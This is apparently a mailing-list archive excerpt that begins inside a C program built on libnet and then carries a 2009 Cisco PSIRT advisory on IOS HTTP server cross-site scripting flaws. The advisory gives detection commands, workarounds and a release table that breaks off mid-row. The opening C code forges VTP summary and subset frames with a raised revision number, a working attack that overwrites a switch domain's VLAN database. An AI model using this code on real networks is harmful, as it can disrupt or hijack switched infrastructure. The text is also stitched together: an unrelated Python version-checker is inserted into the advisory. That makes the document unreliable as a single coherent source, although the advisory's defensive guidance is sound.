    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
         
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
    
//build the second vtp packet for vtp_subset
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
    
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain));
     vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));
    
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}

From - Wed Jan 14 13:22:18 2009
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Response: Cisco IOS Cross-Site Scripting Vulnerabilities
Date: Wed, 14 Jan 2009 17:00:00 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Response: Cisco IOS Cross-Site Scripting
Vulnerabilities

http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Cisco Response
=============
Two separate Cisco IOS Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco by two
independent researchers. ProCheckup has posted a Security Advisory
titled "XSS on Cisco IOS HTTP Server" posted at 
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19

Cisco would like to thank Adrian Pastor and Richard J. Brain of
ProCheckUp and Nobuhiro Tsuji of NTT Data Security Corporation with
co-operation of JPCert.

This Cisco Security Response is posted at the following link: 
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Additional Information
=====================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including HTTP secure server - hereafter referred to
as purely HTTP Server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.

To determine if the HTTP server is running on your device, issue the
show ip http server status | include status and the show ip http
server secure status | include status commands at the prompt and look
for output similar to:

    Router#show ip http server status | include status
    HTTP server status: Enabled
    HTTP secure server status: Enabled

If the device is not running the HTTP server, you should see output
similar to:

    Router#show ip http server status | include status
    HTTP server status: Disabled
    HTTP secure server status: Disabled

These vulnerabilities are documented in the following Cisco bug IDs:

  * Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server 
    Special Characters are not escaped in URL strings sent to the
    HTTP server.
  * Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
    Special Characters are not escaped in URL strings sent to the
    HTTP server, via the ping parameter. The ping parameter is used
    both by external applications such as Router and Security Device
    Manager (SDM) as well as a direct HTTP session to Cisco IOS http
    server. This vulnerability affects 12.1E based trains and all
    Cisco IOS releases after 12.2(13)T.

These vulnerabilities are independent of each other. For a full
solution, download a Cisco IOS version that contains the fixes for
both Cisco bug IDs. These vulnerabilities have been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2008-3821.

Workaround
+---------

If the HTTP server is not used for any legitimate purposes on the
device, it is a best practice to disable it by issuing the following
commands in configure mode:

    no ip http server
    no ip http secure-server

If the HTTP server is required, it is a recommended best practice to
control which hosts may access the HTTP server to only trusted
sources. To control which hosts can access the HTTP server, you can
apply an access list to the HTTP server. To apply an access list to
the HTTP server, use the following command in global configuration
mode:

    ip http access-class {access-list-number | access-list-name}

The following example shows an access list that allows only trusted
hosts to access the Cisco IOS HTTP server:

    ip access-list standard 20
    permit 192.168.1.0 0.0.0.255
    remark "Above is a trusted subnet"
    remark "Add further trusted subnets or hosts below"

    ! (Note: all other access implicitly denied)
    ! (Apply the access-list to the http server)

    ip http access-class 20

For additional information on configuring the Cisco IOS HTTP server,
consult Using the Cisco Web Browser User Interface.

For additional information on cross-site scripting attacks and the
methods used to exploit these vulnerabilities, please refer to the
Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting
(XSS) Threat Vectors", which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml

Further Problem Description
+--------------------------

This vulnerability is about escaping characters in the URL that are
sent to the HTTP server. This vulnerability is different from the
vulnerability reported in Cisco bug ID CSCsc64976. The fix for this
vulnerability is to escape special characters in the URL string 
echoed in the response generated by the web exec application.

Software Version and Fixes
+-------------------------

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible
releases that contain the fix (the "First Fixed Release") and the
anticipated date of availability for each are listed in the "Rebuild"
and "Maintenance" columns. A device running a release in the given
train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later
version (greater than or equal to the First Fixed Release label).

For more information on the terms "Rebuild" and "Maintenance,"
consult the following URL: 
http://www.cisco.com/warp/public/620/1.html
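
The comparison rule described above, applied to a few rows copied from the table below, as an added example (not Cisco's code). The function names, the `TABLE` subset and the device releases in the demo are assumptions made for illustration; the parser handles only the common `major.minor(maintenance)TRAINrebuild` form and rejects special images such as 12.0(3c)W5(8).

```python
import re
from typing import NamedTuple

# major.minor(maintenance[interim letter])TRAIN[rebuild], e.g. 12.2(44)SE4
_RELEASE = re.compile(r"^(\d+)\.(\d+)\((\d+)([a-z]?)\)([A-Z]*)(\d*)$")


class Release(NamedTuple):
    major: int
    minor: int
    maintenance: int
    interim: str
    train_id: str
    rebuild: int

    @property
    def train(self) -> str:
        # Row label as used in the table, e.g. "12.2SE" or "12.4" (mainline).
        return f"{self.major}.{self.minor}{self.train_id}"

    @property
    def order(self):
        # Ordering is only meaningful between releases of the same train.
        return (self.maintenance, self.interim, self.rebuild)


def parse_release(text: str) -> Release:
    m = _RELEASE.match(text.strip())
    if not m:
        raise ValueError(f"unsupported release string: {text!r}")
    major, minor, maint, interim, train_id, rebuild = m.groups()
    return Release(int(major), int(minor), int(maint), interim,
                   train_id, int(rebuild or 0))


# Subset of rows copied from this advisory: train -> "First Fixed Release" cell.
TABLE = {
    "12.0S": "12.0(33)S3; Available on 03-APR-2009",
    "12.2EX": "12.2(40)EX",
    "12.2SE": "12.2(40)SE",
    "12.2SG": "12.2(44)SG",
    "12.2SGA": "12.2(31)SGA9",
    "12.2XN": "12.2(33)XN1",
    "12.2SXH": "Not Vulnerable",
    "12.2SRC": "Not Vulnerable",
    "12.1E": "Vulnerable; contact TAC",
    "12.1AX": "Vulnerable; first fixed in 12.2SE",
    "12.2SRA": "Vulnerable; migrate to any release in 12.2SRC",
}


def assess(running: str, table=TABLE):
    """Return (status, detail) for one running release string."""
    release = parse_release(running)
    cell = table.get(release.train)
    if cell is None:
        return ("unknown", f"train {release.train} not in table subset")
    if cell == "Not Vulnerable":
        return ("not vulnerable", cell)
    if cell.startswith("Vulnerable;"):
        # No fixed release inside this train: every release is affected.
        return ("vulnerable", cell)
    fixed_text = cell.split(";")[0].strip()
    fixed = parse_release(fixed_text)
    if fixed.train != release.train:
        raise ValueError(f"row {release.train} lists a release of {fixed.train}")
    if release.order < fixed.order:
        return ("vulnerable", f"upgrade to {fixed_text} or later")
    return ("fixed", f"at or beyond {fixed_text}")


if __name__ == "__main__":
    # Constructed inventory, not taken from the advisory.
    for version in ["12.2(35)SE5", "12.2(44)SE4", "12.2(31)SGA8",
                    "12.0(32)S12", "12.2(33)SXH4", "12.1(22)E6"]:
        status, detail = assess(version)
        print(f"{version:14} {status:15} {detail}")
```

Rows whose cell begins with "Vulnerable;" have no fix inside the train, so the function reports every release of that train as vulnerable and passes the table's migration text through unchanged.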

+----------------------------------------+
|   Major    | Availability of Repaired  |
|  Release   |         Releases          |
|------------+---------------------------|
|  Affected  | First Fixed | Recommended |
| 12.0-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | 12.0(33)S3; |             |
| 12.0S      | Available   |             |
|            | on          |             |
|            | 03-APR-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SC     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SL     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0SP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0ST     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SX     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SY     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SZ     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.0(3c)W5  |
| 12.0W      | first fixed | (8)         |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0WC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0WT     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.0XF     | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.0(4)XI2  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.0XI     | release     | 12.4(15)    |
|            | 12.0(4)XI2  | T812.4(23)  |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XK     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XN     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.1-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1AA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AY     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1AZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1CX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1DC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1E      | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1EA     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.1EB     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.1EC     | first fixed | SCA212.2    |
|            | in 12.3BC   | (33)SCB12.3 |
|            |             | (23)BC6     |
|------------+-------------+-------------|
| 12.1EO     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.1EU     | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.1EV     | first fixed | S1212.2(33) |
|            | in 12.4     | SB312.4(15) |
|            |             | T812.4(23)  |
|------------+-------------+-------------|
|            |             | 12.2(31)    |
|            | Vulnerable; | SGA912.2    |
| 12.1EW     | first fixed | (50)SG12.4  |
|            | in 12.4     | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1EX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1EY     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1EZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1GA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1GB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XE     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XF     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XG     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XI     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XJ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XL     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XM     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XQ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XR     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XS     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XT     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XU     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XV     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XY     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1XZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Releases    |             |
|            | prior to    |             |
|            | 12.1(5)YE6  |             |
|            | are         |             |
|            | vulnerable, |             |
| 12.1YE     | release     | 12.4(15)    |
|            | 12.1(5)YE6  | T812.4(23)  |
|            | and later   |             |
|            | are not     |             |
|            | vulnerable; |             |
|            | first fixed |             |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YF     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.1YH     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
| 12.1YI     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.1YJ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|  Affected  | First Fixed | Recommended |
| 12.2-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2B      | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2BC     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BW     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(33)    |
| 12.2BX     | first fixed | SB312.4(15) |
|            | in 12.4     | T812.4(23)  |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BY     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2BZ     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2CX     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            |             | 12.2(33)    |
|            | Vulnerable; | SCA212.2    |
| 12.2CY     | first fixed | (33)SCB12.3 |
|            | in 12.4     | (23)BC612.4 |
|            |             | (15)T812.4  |
|            |             | (23)        |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(20)    |
| 12.2CZ     | first fixed | S1212.2(33) |
|            | in 12.2SB   | SB3         |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DD     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2DX     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EW     | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(31)    |
| 12.2EWA    | first fixed | SGA912.2    |
|            | in 12.2SG   | (50)SG      |
|------------+-------------+-------------|
| 12.2EX     | 12.2(40)EX  | 12.2(44)EX1 |
|------------+-------------+-------------|
|            | 12.2(44)EY; | 12.2(46)EY; |
| 12.2EY     | Available   | Available   |
|            | on          | on          |
|            | 30-JAN-2009 | 23-JAN-2009 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2EZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FX     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.2(44)    |
| 12.2FY     | first fixed | EX112.2(44) |
|            | in 12.2EX   | SE4         |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2FZ     | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
| 12.2IRA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IRB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2IXA    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXB    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXC    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXD    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXE    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXF    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2IXG    | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
| 12.2JA     | Vulnerable; |             |
|            | contact TAC |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2JK     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2MB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.2MC     | first fixed | T812.4(23)  |
|            | in 12.4T    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2S      | first fixed | 12.2(20)S12 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
|            | 12.2(33)    |             |
|            | SB12.2(31)  |             |
| 12.2SB     | SB14;       | 12.2(33)SB3 |
|            | Available   |             |
|            | on          |             |
|            | 16-JAN-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SBC    | first fixed | 12.2(33)SB3 |
|            | in 12.2SB   |             |
|------------+-------------+-------------|
| 12.2SCA    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SCB    | Not         |             |
|            | Vulnerable  |             |
|------------+-------------+-------------|
| 12.2SE     | 12.2(40)SE  | 12.2(44)SE4 |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEA    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEB    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.2SEC    | first fixed | 12.2(44)SE4 |
|            | in 12.2SE   |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
